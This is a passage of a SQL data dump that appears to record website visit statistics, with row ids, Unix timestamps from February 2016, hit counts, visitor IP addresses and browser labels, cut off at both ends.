0,'8.29.198.25','other'),(4248,1455677967,1,1,0,0,'157.55.39.150','other'),(4249,1455678446,1,1,0,0,'207.46.13.125','other'),(4250,1455678612,10,10,0,0,'82.193.127.15','other'),(4251,1455679299,1,1,0,0,'5.255.253.10','other'),(4252,1455679302,1,1,0,0,'5.255.253.9','other'),(4253,1455680390,1,0,1,0,'68.180.229.232',''),(4254,1455680939,2,2,0,0,'37.9.122.203','other'),(4255,1455681182,1,1,0,0,'37.9.122.201','other'),(4256,1455681186,1,1,0,0,'37.9.122.202','other'),(4257,1455681211,1,1,0,0,'66.249.91.4','other'),(4258,1455681427,1,0,1,0,'66.249.69.11',''),(4259,1455681859,2,0,2,0,'68.180.229.232',''),(4260,1455682680,1,0,1,0,'66.249.69.3',''),(4261,1455683521,1,1,0,0,'157.55.39.58','other'),(4262,1455684097,1,0,1,0,'66.249.69.124',''),(4263,1455684266,1,0,1,0,'66.249.69.3',''),(4264,1455684475,1,0,1,0,'66.249.69.11',''),(4265,1455684674,1,1,0,0,'207.46.13.91','other'),(4266,1455684736,1,1,0,0,'66.102.9.94','firefox'),(4267,1455684804,1,1,0,0,'46.211.154.212','chrome'),(4268,1455684839,1,1,0,0,'180.76.15.32','other'),(4269,1455684980,1,0,1,0,'68.180.229.232',''),(4270,1455685189,1,1,0,0,'157.55.39.58','other'),(4271,1455686230,2,0,2,0,'66.249.69.124',''),(4272,1455686379,1,1,0,0,'207.46.13.125','other'),(4273,1455686887,1,0,1,0,'68.180.229.232',''),(4274,1455687079,1,1,0,0,'180.76.15.134','other'),(4275,1455687435,1,1,0,0,'217.69.136.210','other'),(4276,1455687436,1,1,0,0,'217.69.136.203','other'),(4277,1455687746,1,1,0,0,'46.211.115.196','chrome'),(4278,1455688134,1,0,1,0,'66.249.69.11',''),(4279,1455688317,1,0,1,0,'66.249.69.124',''),(4280,1455688770,1,1,0,0,'8.29.198.26','other'),(4281,1455689160,1,1,0,0,'109.227.112.82','chrome'),(4282,1455689338,1,1,0,0,'62.210.215.100','chrome'),(4283,1455689392,2,0,2,0,'66.249.69.11',''),(4284,1455689974,1,1,0,0,'91.196.178.67','chrome'),(4285,1455690826,1,1,0,0,'66.249.93.94','firefox'),(4286,1455691172,2,2,0,0,'91.196.178.168','chrome'),(4287,1455691311,1,1,0,0,'109.227.112.82','chrome'),(4288,1455691435,1,1,0,0,'37.52.126.86','chrome'),(4289,1455691703,1,1,0,0,'66.249.91.4','other'),(4290,1455691805,1,1,0,0,'91.196.178.168','other'),(4291,1455691903,1,0,1,0,'66.249.69.11',''),(4292,1455692155,1,1,0,0,'178.154.149.11','other'),(4293,1455692156,1,1,0,0,'141.8.183.14','other'),(4294,1455692643,1,0,1,0,'66.249.69.124',''),(4295,1455692684,2,2,0,0,'94.23.199.80','msie'),(4296,1455693111,51,51,0,0,'80.91.162.99','other'),(4297,1455693524,1,1,0,0,'91.196.178.65','chrome'),(4298,1455693936,1,1,0,0,'212.111.198.100','chrome'),(4299,1455694000,1,1,0,0,'40.77.167.82','other'),(4300,1455694003,8,8,0,0,'157.55.39.150','other'),(4301,1455694013,4,4,0,0,'157.55.39.58','other'),(4302,1455694014,2,0,2,0,'68.180.229.232',''),(4303,1455694018,2,2,0,0,'207.46.13.125','other'),(4304,1455694197,1,0,1,0,'66.249.69.11',''),(4305,1455694418,1,1,0,0,'31.207.129.230','firefox'),(4306,1455694441,2,0,2,0,'66.249.69.124',''),(4307,1455694721,1,1,0,0,'82.145.222.135','chrome'),(4308,1455695170,2,0,2,0,'66.249.69.11',''),(4309,1455695456,1,1,0,0,'178.92.67.65','firefox'),(4310,1455696016,1,0,1,0,'66.249.69.3',''),(4311,1455696218,1,0,1,0,'66.249.69.124',''),(4312,1455696353,1,0,1,0,'66.249.69.11',''),(4313,1455696762,1,1,0,0,'195.68.216.88','chrome'),(4314,1455696763,1,1,0,0,'78.111.190.176','firefox'),(4315,1455697222,1,0,1,0,'66.249.69.124',''),(4316,1455697561,1,0,1,0,'68.180.229.232',''),(4317,1455698030,1,1,0,0,'37.52.157.243','chrome'),(4318,1455698184,1,1,0,0,'37.53.92.92','chrome'),(4319,1455698284,10,10,0,0,'83.218.232.238','other'),(4320,1455698396,1,1,0,0,'91.196.178.70','firefox'),(4321,1455698461,1,0,1,0,'66.249.69.124',''),(4322,1455699588,1,1,0,0,'8.29.198.26','other'),(4323,1455699663,1,1,0,0,'37.54.57.64','firefox'),(4324,1455699727,1,1,0,0,'176.67.10.49','opera'),(4325,1455699834,1,1,0,0,'157.55.39.66','other'),(4326,1455699899,2,0,2,0,'66.249.69.11',''),(4327,1455700208,2,2,0,0,'91.196.178.70','firefox'),(4328,1455700328,1,0,1,0,'66.249.69.3',''),(4329,1455700607,2,0,2,0,'66.249.69.124',''),(4330,1455700921,1,1,0,0,'46.201.240.112','firefox'),(4331,1455701361,1,1,0,0,'91.196.178.39','chrome'),(4332,1455701484,2,0,2,0,'66.249.69.3',''),(4333,1455701572,1,1,0,0,'217.69.136.209','other'),(4334,1455701826,1,1,0,0,'62.210.215.100','chrome'),(4335,1455701912,1,0,1,0,'68.180.229.232',''),(4336,1455702033,1,0,1,0,'66.249.69.124',''),(4337,1455702169,1,1,0,0,'217.69.133.18','other'),(4338,1455702565,1,0,1,0,'66.249.69.3',''),(4339,1455702607,1,1,0,0,'217.69.133.69','other'),(4340,1455702608,1,1,0,0,'217.69.133.229','other'),(4341,1455702738,1,1,0,0,'157.55.39.66','other'),(4342,1455702851,1,0,1,0,'66.249.69.11',''),(4343,1455703235,1,1,0,0,'212.111.198.100','chrome'),(4344,1455703949,1,0,1,0,'66.249.69.11',''),(4345,1455704110,1,1,0,0,'91.229.242.115','opera'),(4346,1455704684,1,1,0,0,'94.179.72.187','firefox'),(4347,1455704850,1,0,1,0,'68.180.229.232',''),(4348,1455705229,2,2,0,0,'217.77.213.50','opera'),(4349,1455705368,1,1,0,0,'217.69.133.243','other'),(4350,1455705438,1,1,0,0,'62.210.215.100','chrome'),(4351,1455705532,1,1,0,0,'91.196.178.131','firefox'),(4352,1455705537,1,1,0,0,'91.196.178.167','chrome'),(4353,1455706052,154,154,0,0,'195.154.185.20','other'),(4354,1455706313,1,0,1,0,'68.180.229.232',''),(4355,1455706314,2,2,0,0,'141.8.184.18','other'),(4356,1455706356,1,1,0,0,'91.196.178.71','chrome'),(4357,1455706475,1,1,0,0,'92.113.55.65','chrome'),(4358,1455706759,4,4,0,0,'178.154.149.11','other'),(4359,1455706762,3,3,0,0,'141.8.183.14','other'),(4360,1455706764,3,3,0,0,'130.193.37.21','other'),(4361,1455706766,1,1,0,0,'141.8.132.99','other'),(4362,1455706778,2,2,0,0,'93.158.152.9','other'),(4363,1455706782,2,2,0,0,'5.255.253.53','other'),(4364,1455706846,1,1,0,0,'217.69.133.84','other'),(4365,1455706983,1,1,0,0,'66.249.91.4','other'),(4366,1455707245,1,1,0,0,'217.69.133.223','other'),(4367,1455707591,3,0,3,0,'66.249.69.3',''),(4368,1455707955,1,0,1,0,'68.180.229.232',''),(4369,1455708186,1,1,0,0,'5.255.253.51','other'),(4370,1455708208,1,1,0,0,'66.249.93.90','firefox'),(4371,1455708300,1,1,0,0,'95.134.116.124','chrome'),(4372,1455708419,1,1,0,0,'180.76.15.20','other'),(4373,1455708535,1,0,1,0,'66.249.69.3',''),(4374,1455708545,1,1,0,0,'91.196.178.132','firefox'),(4375,1455708744,1,0,1,0,'66.249.69.11',''),(4376,1455708776,1,1,0,0,'91.196.178.11','chrome'),(4377,1455708855,1,1,0,0,'80.91.162.99','other'),(4378,1455709269,1,1,0,0,'5.255.253.55','other'),(4379,1455709594,1,1,0,0,'157.55.39.66','other'),(4380,1455709657,1,1,0,0,'178.94.220.134','firefox'),(4381,1455709972,3,3,0,0,'80.91.162.99','other'),(4382,1455709995,1,1,0,0,'217.69.136.204','other'),(4383,1455710000,1,1,0,0,'46.201.214.252','firefox'),(4384,1455710362,1,1,0,0,'180.76.15.154','other'),(4385,1455710420,1,1,0,0,'8.29.198.26','other'),(4386,1455710429,1,1,0,0,'180.76.15.147','other'),(4387,1455710431,1,1,0,0,'180.76.15.153','other'),(4388,1455710595,1,1,0,0,'130.193.51.81','other'),(4389,1455710597,1,1,0,0,'141.8.132.2','other'),(4390,1455710694,1,1,0,0,'217.69.136.206','other'),(4391,1455710815,1,1,0,0,'91.196.178.69','firefox'),(4392,1455711663,1,0,1,0,'66.249.69.3',''),(4393,1455711765,1,1,0,0,'5.255.253.100','other'),(4394,1455711768,1,1,0,0,'141.8.183.14','other'),(4395,1455712025,2,0,2,0,'68.180.229.232',''),(4396,1455712681,1,1,0,0,'217.69.133.29','other'),(4397,1455712793,1,1,0,0,'46.201.214.252','firefox'),(4398,1455712809,22,22,0,0,'91.209.51.22','other'),(4399,1455712908,4,4,0,0,'141.8.184.18','other'),(4400,1455712910,2,2,0,0,'178.154.149.11','other'),(4401,1455712922,1,1,0,0,'93.158.152.9','other'),(4402,1455712926,2,2,0,0,'141.8.183.14','other'),(4403,1455713048,1,1,0,0,'62.210.215.100','chrome'),(4404,1455713179,1,0,1,0,'68.180.229.232',''),(4405,1455713223,1,1,0,0,'91.196.178.130','firefox'),(4406,1455713258,4,4,0,0,'77.248.252.113','other'),(4407,1455713616,1,1,0,0,'217.69.136.207','other'),(4408,1455713664,1,1,0,0,'37.54.61.84','chrome'),(4409,1455713890,1,1,0,0,'178.154.149.11','other'),(4410,1455713893,2,2,0,0,'5.255.253.53','other'),(4411,1455714166,1,1,0,0,'46.201.214.252','firefox'),(4412,1455714225,7,7,0,0,'82.193.127.15','other'),(4413,1455715288,2,0,2,0,'66.249.69.3',''),(4414,1455715411,1,1,0,0,'94.153.229.226','chrome'),(4415,1455715684,1,1,0,0,'217.69.133.218','other'),(4416,1455715911,1,1,0,0,'91.196.178.67','chrome'),(4417,1455716044,1,1,0,0,'217.69.133.217','other'),(4418,1455716247,1,1,0,0,'94.178.95.114','chrome'),(4419,1455716453,1,1,0,0,'91.196.178.39','firefox'),(4420,1455716512,1,1,0,0,'178.154.149.11','other'),(4421,1455716786,1,1,0,0,'91.196.178.66','firefox'),(4422,1455716955,1,1,0,0,'95.108.133.211','chrome'),(4423,1455717335,3,0,3,0,'68.180.229.232',''),(4424,1455717490,1,1,0,0,'91.196.179.33','firefox'),(4425,1455717692,1,1,0,0,'66.249.91.32','other'),(4426,1455717771,1,0,1,0,'66.249.69.11',''),(4427,1455717780,1,0,1,0,'66.249.69.124',''),(4428,1455717902,1,1,0,0,'91.196.178.129','firefox'),(4429,1455717940,1,1,0,0,'217.69.133.194','other'),(4430,1455718607,1,1,0,0,'91.196.177.144','chrome'),(4431,1455718638,1,1,0,0,'157.55.39.174','other'),(4432,1455718730,1,1,0,0,'217.69.136.210','other'),(4433,1455718731,1,1,0,0,'217.69.136.208','other'),(4434,1455719032,3,0,3,0,'68.180.229.232',''),(4435,1455719037,1,1,0,0,'40.77.167.6','other'),(4436,1455719256,1,0,1,0,'66.249.69.3',''),(4437,1455719351,1,1,0,0,'141.8.132.97','other'),(4438,1455719451,2,2,0,0,'217.69.136.206','other'),(4439,1455719648,1,1,0,0,'178.92.248.4','chrome'),(4440,1455719983,2,2,0,0,'82.193.127.15','other'),(4441,1455719985,1,1,0,0,'157.55.39.66','other'),(4442,1455720337,1,0,1,0,'66.249.69.124',''),(4443,1455720339,1,0,1,0,'66.249.69.3',''),(4444,1455720412,1,0,1,0,'66.249.69.11',''),(4446,1455720433,1,1,0,0,'78.111.185.86','chrome'),(4447,1455720638,1,1,0,0,'91.196.178.67','chrome'),(4448,1455720662,1,1,0,0,'157.55.39.174','other'),(4449,1455720806,1,0,1,0,'68.180.229.232',''),(4450,1455720879,1,1,0,0,'40.77.167.6','other'),(4451,1455721040,4,4,0,0,'174.34.135.242','other'),(4452,1455721250,1,1,0,0,'8.29.198.26','other'),(4453,1455721325,1,1,0,0,'207.46.13.125','other'),(4454,1455721483,1,1,0,0,'217.69.136.207','other'),(4455,1455721688,2,0,2,0,'66.249.69.3',''),(4456,1455721749,1,1,0,0,'217.69.133.231','other'),(4457,1455721792,1,1,0,0,'217.69.133.190','other'),(4458,1455721819,1,1,0,0,'217.69.133.220','other'),(4459,1455722057,3,0,3,0,'66.249.69.124',''),(4460,1455722327,1,1,0,0,'94.179.11.142','chrome'),(4461,1455722433,1,0,1,0,'66.249.75.85',''),(4462,1455723064,2,2,0,0,'157.55.39.66','other'),(4463,1455723417,2,0,2,0,'68.180.229.232',''),(4464,1455724529,1,1,0,0,'217.69.133.12','other'),(4465,1455724786,1,0,1,0,'66.249.69.11',''),(4466,1455724938,1,1,0,0,'62.210.215.100','chrome'),(4467,1455724961,1,0,1,0,'66.249.69.124',''),(4468,1455725083,1,1,0,0,'141.8.184.18','other'),(4469,1455725323,1,1,0,0,'91.196.179.33','firefox'),(4470,1455725835,1,1,0,0,'217.69.133.31','other'),(4471,1455725837,1,1,0,0,'217.69.133.28','other'),(4472,1455726286,8,8,0,0,'178.154.149.11','other'),(4473,1455726454,1,1,0,0,'217.69.133.247','other'),(4474,1455726485,1,1,0,0,'217.69.133.228','other'),(4475,1455726511,3,3,0,0,'178.151.143.163','other'),(4476,1455726527,1,1,0,0,'217.69.133.226','other'),(4477,1455726631,6,6,0,0,'93.158.152.9','other'),(4478,1455726634,4,4,0,0,'130.193.37.21','other'),(4479,1455726656,7,7,0,0,'141.8.184.18','other'),(4480,1455726662,4,4,0,0,'141.8.183.14','other'),(4481,1455726672,1,1,0,0,'141.8.132.99','other'),(4482,1455727264,1,1,0,0,'217.69.133.236','other'),(4483,1455727274,1,1,0,0,'217.69.133.219','other'),(4484,1455727438,1,0,1,0,'66.249.69.124',''),(4485,1455727635,1,1,0,0,'5.255.253.110','other'),(4486,1455728000,1,1,0,0,'207.46.13.125','other'),(4487,1455728365,2,0,2,0,'66.249.69.3',''),(4488,1455728375,1,1,0,0,'5.255.253.53','other'),(4489,1455728521,1,1,0,0,'66.249.91.8','other'),(4490,1455729074,1,1,0,0,'157.55.39.66','other'),(4491,1455729168,1,1,0,0,'178.94.172.78','chrome'),(4492,1455729196,1,1,0,0,'178.154.149.11','other'),(4493,1455729199,1,1,0,0,'141.8.183.14','other'),(4494,1455730029,1,1,0,0,'141.8.184.18','other'),(4495,1455730140,1,1,0,0,'80.91.162.99','other'),(4496,1455730146,2,0,2,0,'66.249.69.3',''),(4497,1455730368,1,1,0,0,'178.154.149.11','other'),(4498,1455730827,1,1,0,0,'217.69.133.6','other'),(4499,1455731077,1,1,0,0,'157.55.39.166','other'),(4500,1455731104,1,1,0,0,'141.8.183.14','other'),(4501,1455731299,1,0,1,0,'66.249.69.11',''),(4502,1455731416,1,1,0,0,'93.158.152.9','other'),(4503,1455732108,1,0,1,0,'66.249.66.158',''),(4504,1455732138,1,0,1,0,'66.249.66.150',''),(4505,1455732145,1,1,0,0,'8.29.198.26','other'),(4506,1455732288,1,1,0,0,'40.77.167.6','other'),(4507,1455732413,1,1,0,0,'217.69.133.223','other'),(4508,1455732423,1,1,0,0,'195.12.59.162','other'),(4509,1455732430,1,1,0,0,'178.154.149.11','other'),(4510,1455732434,1,1,0,0,'141.8.183.14','other'),(4511,1455732847,1,0,1,0,'68.180.229.232',''),(4512,1455733294,1,1,0,0,'93.158.152.9','other'),(4513,1455733449,1,1,0,0,'207.46.13.125','other'),(4514,1455733533,1,1,0,0,'217.69.133.252','other'),(4515,1455733588,115,115,0,0,'94.199.151.22','other'),(4516,1455733778,1,1,0,0,'217.69.133.233','other'),(4517,1455733979,1,1,0,0,'91.196.178.72','chrome'),(4518,1455734043,1,1,0,0,'157.55.39.66','other'),(4519,1455734123,1,1,0,0,'37.54.19.254','firefox'),(4520,1455734384,1,1,0,0,'141.8.132.99','other'),(4521,1455734562,1,1,0,0,'217.69.136.209','other'),(4522,1455734917,1,1,0,0,'82.193.127.15','other'),(4523,1455735218,1,1,0,0,'93.158.152.9','other'),(4524,1455735542,1,1,0,0,'46.211.139.21','chrome'),(4525,1455735711,1,1,0,0,'40.77.167.6','other'),(4526,1455736060,1,0,1,0,'68.180.229.232',''),(4527,1455736245,1,0,1,0,'66.249.66.150',''),(4528,1455736277,1,1,0,0,'217.69.133.248','other'),(4529,1455736279,1,1,0,0,'62.210.215.100','chrome'),(4530,1455736284,1,1,0,0,'207.46.13.125','other'),(4531,1455736344,1,1,0,0,'141.8.184.22','other'),(4532,1455736595,1,1,0,0,'195.10.210.49','chrome'),(4533,1455736764,1,0,1,0,'66.249.66.173',''),(4534,1455737130,1,1,0,0,'217.69.133.4','other'),(4535,1455737231,1,1,0,0,'217.69.133.220','other'),(4536,1455737438,1,1,0,0,'130.193.51.43','other'),(4537,1455737524,1,1,0,0,'93.158.152.26','other'),(4538,1455737527,1,1,0,0,'5.255.253.94','other'),(4539,1455737531,1,1,0,0,'5.255.253.9','other'),(4540,1455737545,1,1,0,0,'130.193.51.45','other'),(4541,1455737564,1,1,0,0,'141.8.142.10','other'),(4542,1455737583,1,1,0,0,'141.8.184.18','other'),(4543,1455737718,1,1,0,0,'37.53.89.22','chrome'),(4544,1455738360,1,1,0,0,'217.69.133.60','other'),(4545,1455738511,1,1,0,0,'217.69.133.227','other'),(4546,1455738837,1,1,0,0,'66.249.93.94','other'),(4547,1455738871,191,191,0,0,'80.91.162.99','other'),(4548,1455739085,1,0,1,0,'68.180.229.232',''),(4549,1455739127,1,1,0,0,'157.55.39.166','other'),(4550,1455739429,56,56,0,0,'136.243.36.97','other'),(4551,1455739459,1,1,0,0,'5.255.253.10','other'),(4552,1455739552,1,1,0,0,'66.249.92.95','other'),(4553,1455739823,1,0,1,0,'66.249.66.154',''),(4554,1455740050,1,1,0,0,'217.69.133.28','other'),(4555,1455740166,1,1,0,0,'141.8.132.99','other'),(4556,1455740169,1,1,0,0,'93.158.152.26','other'),(4557,1455740174,1,1,0,0,'141.8.132.97','other'),(4558,1455740176,1,1,0,0,'5.255.253.55','other'),(4559,1455740180,1,1,0,0,'178.154.149.11','other'),(4560,1455740184,1,1,0,0,'5.255.253.51','other'),(4561,1455740187,1,1,0,0,'130.193.51.45','other'),(4562,1455740191,1,1,0,0,'141.8.142.10','other'),(4563,1455740196,1,1,0,0,'5.255.253.110','other'),(4564,1455740199,1,1,0,0,'141.8.132.79','other'),(4565,1455740202,1,1,0,0,'141.8.184.18','other'),(4566,1455741406,1,0,1,0,'66.249.66.154',''),(4567,1455741664,1,1,0,0,'207.46.13.125','other'),(4568,1455741921,1,0,1,0,'66.249.66.158',''),(4569,1455741961,2,0,2,0,'66.249.66.150',''),(4570,1455742428,1,1,0,0,'66.249.93.94','other'),(4571,1455742875,1,1,0,0,'180.76.15.28','other'),(4572,1455742996,1,1,0,0,'8.29.198.25','other'),(4573,1455743021,1,1,0,0,'217.69.133.15','other'),(4574,1455743029,2,2,0,0,'207.46.13.125','other'),(4575,1455743340,1,0,1,0,'66.249.66.150',''),(4576,1455743613,1,0,1,0,'66.249.66.158',''),(4577,1455743891,1,0,1,0,'66.249.66.154',''),(4578,1455744668,1,1,0,0,'130.193.51.45','other'),(4579,1455744670,1,1,0,0,'141.8.184.11','other'),(4580,1455744693,1,0,1,0,'68.180.229.232',''),(4581,1455744790,19,19,0,0,'82.193.127.15','other'),(4582,1455745146,2,2,0,0,'217.69.136.204','other'),(4583,1455745207,2,0,2,0,'66.249.66.150',''),(4584,1455745327,1,1,0,0,'217.69.133.191','other'),(4585,1455745787,1,1,0,0,'157.55.39.166','other'),(4586,1455745973,1,1,0,0,'66.249.93.90','other'),(4587,1455746629,2,2,0,0,'82.193.127.15','other'),(4588,1455746759,1,0,1,0,'68.180.229.232',''),(4589,1455746882,1,1,0,0,'178.154.149.11','other'),(4590,1455747109,1,1,0,0,'157.55.39.166','other'),(4591,1455747923,1,1,0,0,'207.46.13.125','other'),(4592,1455748056,1,1,0,0,'62.210.215.100','chrome'),(4593,1455748363,1,0,1,0,'66.249.66.154',''),(4594,1455748933,1,1,0,0,'217.69.133.228','other'),(4595,1455749597,1,1,0,0,'66.249.93.86','other'),(4596,1455750882,2,2,0,0,'141.8.184.18','other'),(4597,1455750930,1,1,0,0,'66.249.92.95','other'),(4598,1455751148,1,0,1,0,'68.180.229.232',''),(4599,1455751207,1,0,1,0,'66.249.66.150',''),(4600,1455751429,1,1,0,0,'217.69.133.9','other'),(4601,1455751747,1,1,0,0,'177.75.16.71','other'),(4602,1455751909,1,1,0,0,'157.55.39.118','other'),(4603,1455753646,17,17,0,0,'80.91.162.99','other'),(4604,1455753777,1,1,0,0,'207.46.13.125','other'),(4605,1455753823,1,1,0,0,'8.29.198.26','other'),(4606,1455753906,2,2,0,0,'40.77.167.6','other'),(4607,1455754177,1,1,0,0,'217.69.133.217','other'),(4608,1455754423,1,1,0,0,'217.69.133.220','other'),(4609,1455755147,1,1,0,0,'157.55.39.118','other'),(4610,1455755458,2,2,0,0,'82.193.127.15','other'),(4611,1455755727,1,1,0,0,'207.46.13.15','other'),(4612,1455756224,1,0,1,0,'66.249.66.150',''),(4613,1455756339,2,2,0,0,'149.202.54.34','other'),(4614,1455756989,1,0,1,0,'68.180.229.232',''),(4615,1455757225,1,1,0,0,'217.69.136.208','other'),(4616,1455757408,1,1,0,0,'207.46.13.15','other'),(4617,1455758342,1,1,0,0,'40.77.167.6','other'),(4618,1455758731,1,1,0,0,'217.69.133.231','other'),(4619,1455758776,1,0,1,0,'66.249.66.154',''),(4620,1455759074,1,0,1,0,'68.180.229.232',''),(4621,1455759085,1,1,0,0,'207.46.13.15','other'),(4622,1455759363,1,1,0,0,'217.69.133.218','other'),(4623,1455759995,1,1,0,0,'217.69.133.84','other'),(4624,1455759996,1,1,0,0,'217.69.133.85','other'),(4625,1455760068,1,1,0,0,'62.210.215.100','chrome'),(4626,1455760323,1,0,1,0,'68.180.229.232',''),(4627,1455760700,1,0,1,0,'66.249.66.150',''),(4628,1455761260,1,0,1,0,'66.249.66.158',''),(4629,1455761301,1,1,0,0,'66.249.92.87','other'),(4630,1455762058,1,1,0,0,'157.55.39.166','other'),(4631,1455762397,1,1,0,0,'217.69.133.85','other'),(4632,1455762584,1,1,0,0,'157.55.39.118','other'),(4633,1455763237,1,1,0,0,'157.55.39.166','other'),(4634,1455763492,1,0,1,0,'66.249.66.154',''),(4635,1455764230,1,1,0,0,'207.46.13.15','other'),(4636,1455764648,1,1,0,0,'8.29.198.25','other'),(4637,1455765246,2,2,0,0,'178.154.189.204','other'),(4638,1455765697,1,1,0,0,'217.69.133.239','other'),(4639,1455766143,1,0,1,0,'66.249.66.154',''),(4640,1455766164,1,1,0,0,'217.69.133.223','other'),(4641,1455766165,1,1,0,0,'217.69.133.225','other'),(4642,1455766371,1,1,0,0,'93.158.152.26','other'),(4643,1455767718,1,0,1,0,'68.180.229.232',''),(4644,1455769341,1,1,0,0,'62.210.215.100','chrome'),(4645,1455769432,1,1,0,0,'5.255.253.30','other'),(4646,1455769434,1,1,0,0,'141.8.132.48','other'),(4647,1455769693,1,1,0,0,'217.69.133.190','other'),(4648,1455769984,1,0,1,0,'66.249.66.158',''),(4649,1455771727,2,2,0,0,'194.117.6.240','firefox'),(4650,1455771825,31,31,0,0,'136.243.36.97','other'),(4651,1455772197,188,188,0,0,'31.31.73.93','other'),(4652,1455772500,1,1,0,0,'66.249.92.91','other'),(4653,1455772610,300,300,0,0,'80.91.162.99','other'),(4654,1455772728,16,16,0,0,'136.243.36.97','other'),(4655,1455772950,1,1,0,0,'178.154.149.11','other'),(4656,1455773100,9,9,0,0,'31.31.73.93','other'),(4657,1455773646,3,3,0,0,'136.243.36.97','other'),(4658,1455773696,1,1,0,0,'217.69.133.28','other'),(4659,1455774121,1,0,1,0,'68.180.229.232',''),(4660,1455775604,1,1,0,0,'8.29.198.26','other'),(4661,1455776449,1,0,1,0,'68.180.229.232',''),(4662,1455776491,1,1,0,0,'141.8.184.18','other'),(4663,1455776579,1,1,0,0,'178.92.59.16','chrome'),(4664,1455777181,1,1,0,0,'180.76.15.139','other'),(4665,1455777394,1,1,0,0,'91.196.177.8','chrome'),(4666,1455777594,1,1,0,0,'40.77.167.6','other'),(4667,1455777620,1,0,1,0,'66.249.66.158',''),(4668,1455778080,1,1,0,0,'217.69.133.248','other'),(4669,1455778324,1,1,0,0,'66.249.93.86','firefox'),(4670,1455778401,1,1,0,0,'91.196.178.71','chrome'),(4671,1455778536,1,1,0,0,'66.249.93.90','other'),(4672,1455778789,1,1,0,0,'95.135.176.186','chrome'),(4673,1455779789,1,1,0,0,'91.196.178.71','chrome'),(4674,1455780161,1,1,0,0,'62.210.215.100','chrome'),(4675,1455780227,1,0,1,0,'66.249.66.150',''),(4676,1455780309,1,1,0,0,'101.226.169.208','chrome'),(4677,1455780472,1,1,0,0,'182.118.20.230','msie'),(4678,1455780542,1,0,1,0,'66.249.66.158',''),(4679,1455781067,1,1,0,0,'91.196.178.71','chrome'),(4680,1455781094,1,1,0,0,'91.196.178.132','firefox'),(4681,1455781325,1,1,0,0,'130.193.51.43','other'),(4682,1455781329,1,1,0,0,'141.8.132.76','other'),(4683,1455781446,1,1,0,0,'91.196.178.167','chrome'),(4684,1455782052,1,1,0,0,'78.111.190.44','firefox'),(4685,1455782744,1,1,0,0,'217.69.133.190','other'),(4686,1455783208,1,0,1,0,'66.249.66.173',''),(4687,1455783433,1,1,0,0,'66.249.92.95','other'),(4688,1455784285,131,131,0,0,'82.193.127.15','other'),(4689,1455784331,1,0,1,0,'68.180.229.232',''),(4690,1455784668,2,2,0,0,'178.94.32.41','firefox'),(4691,1455785098,1,0,1,0,'66.249.66.154',''),(4692,1455785187,90,90,0,0,'82.193.127.15','other'),(4693,1455785266,2,0,2,0,'68.180.229.232',''),(4694,1455785270,1,0,1,0,'66.249.66.158',''),(4695,1455785697,1,1,0,0,'66.249.93.94','other'),(4696,1455785771,1,1,0,0,'94.179.113.120','firefox'),(4697,1455786174,1,1,0,0,'91.197.217.11','firefox'),(4698,1455786198,1,0,1,0,'66.249.66.158',''),(4699,1455786452,1,1,0,0,'207.46.13.15','other'),(4700,1455786571,1,1,0,0,'91.196.178.72','firefox'),(4701,1455786629,1,1,0,0,'8.29.198.25','other'),(4702,1455786764,1,1,0,0,'217.69.133.85','other'),(4703,1455786776,1,1,0,0,'91.196.179.61','chrome'),(4704,1455786929,2,2,0,0,'188.64.170.188','chrome'),(4705,1455787294,2,0,2,0,'66.249.66.158',''),(4706,1455787784,1,1,0,0,'217.69.133.68','other'),(4707,1455787914,1,0,1,0,'66.249.66.154',''),(4708,1455788104,1,1,0,0,'85.223.140.210','firefox'),(4709,1455788122,1,1,0,0,'92.113.126.110','chrome'),(4710,1455788338,2,0,2,0,'66.249.66.150',''),(4711,1455788351,1,1,0,0,'91.196.178.71','firefox'),(4712,1455788474,1,1,0,0,'91.196.178.39','firefox'),(4713,1455789126,1,1,0,0,'95.135.33.80','chrome'),(4714,1455789140,2,0,2,0,'68.180.229.232',''),(4715,1455789231,1,1,0,0,'62.210.215.100','chrome'),(4716,1455789516,1,1,0,0,'37.52.44.189','chrome'),(4717,1455789537,1,1,0,0,'66.249.93.94','other'),(4718,1455789740,1,0,1,0,'66.249.66.150',''),(4719,1455790154,1,0,1,0,'66.249.66.154',''),(4720,1455790602,2,0,2,0,'66.249.66.158',''),(4721,1455790687,1,1,0,0,'217.20.167.17','chrome'),(4722,1455790858,1,0,1,0,'68.180.229.232',''),(4723,1455790894,1,1,0,0,'91.196.177.8','chrome'),(4724,1455791048,1,1,0,0,'91.196.178.97','chrome'),(4725,1455791522,1,0,1,0,'66.249.66.169',''),(4726,1455791846,1,1,0,0,'66.102.9.84','firefox'),(4727,1455792270,1,1,0,0,'91.196.177.8','chrome'),(4728,1455792303,1,1,0,0,'180.76.15.142','other'),(4729,1455792344,1,1,0,0,'91.196.178.71','chrome'),(4730,1455792564,6,6,0,0,'130.193.37.21','other'),(4731,1455792617,1,1,0,0,'91.196.178.72','firefox'),(4732,1455792626,1,1,0,0,'94.178.118.118','chrome'),(4733,1455792681,1,1,0,0,'94.178.6.27','chrome'),(4734,1455792904,10,10,0,0,'141.8.184.18','other'),(4735,1455792945,1,1,0,0,'130.193.51.45','other'),(4736,1455792949,3,3,0,0,'141.8.132.99','other'),(4737,1455792962,3,3,0,0,'141.8.183.14','other'),(4738,1455793001,12,12,0,0,'178.154.149.11','other'),(4739,1455793021,3,3,0,0,'93.158.152.9','other'),(4740,1455793032,1,1,0,0,'66.249.93.94','other'),(4741,1455793300,1,1,0,0,'217.69.133.224','other'),(4742,1455793331,2,2,0,0,'5.255.253.53','other'),(4743,1455793419,1,1,0,0,'5.255.253.30','other'),(4744,1455793423,1,1,0,0,'130.193.51.102','other'),(4745,1455793427,1,1,0,0,'5.255.253.10','other'),(4746,1455793440,2,2,0,0,'141.8.142.8','other'),(4747,1455793444,1,1,0,0,'141.8.132.76','other'),(4748,1455793448,1,1,0,0,'5.255.253.110','other'),(4749,1455793453,1,1,0,0,'141.8.142.88','other'),(4750,1455793782,1,1,0,0,'157.55.39.118','other'),(4751,1455794162,2,2,0,0,'93.158.152.9','other'),(4752,1455794183,6,6,0,0,'141.8.184.18','other'),(4753,1455794209,4,4,0,0,'178.154.149.11','other'),(4754,1455794213,1,1,0,0,'141.8.183.14','other'),(4755,1455794223,1,1,0,0,'5.255.253.100','other'),(4756,1455794232,2,2,0,0,'91.124.51.212','firefox'),(4757,1455794266,1,1,0,0,'141.8.132.99','other'),(4758,1455794270,1,1,0,0,'217.69.136.209','other'),(4759,1455794638,1,0,1,0,'68.180.229.232',''),(4760,1455794700,1,1,0,0,'66.249.92.91','other'),(4761,1455794780,1,1,0,0,'157.55.39.118','other'),(4762,1455795164,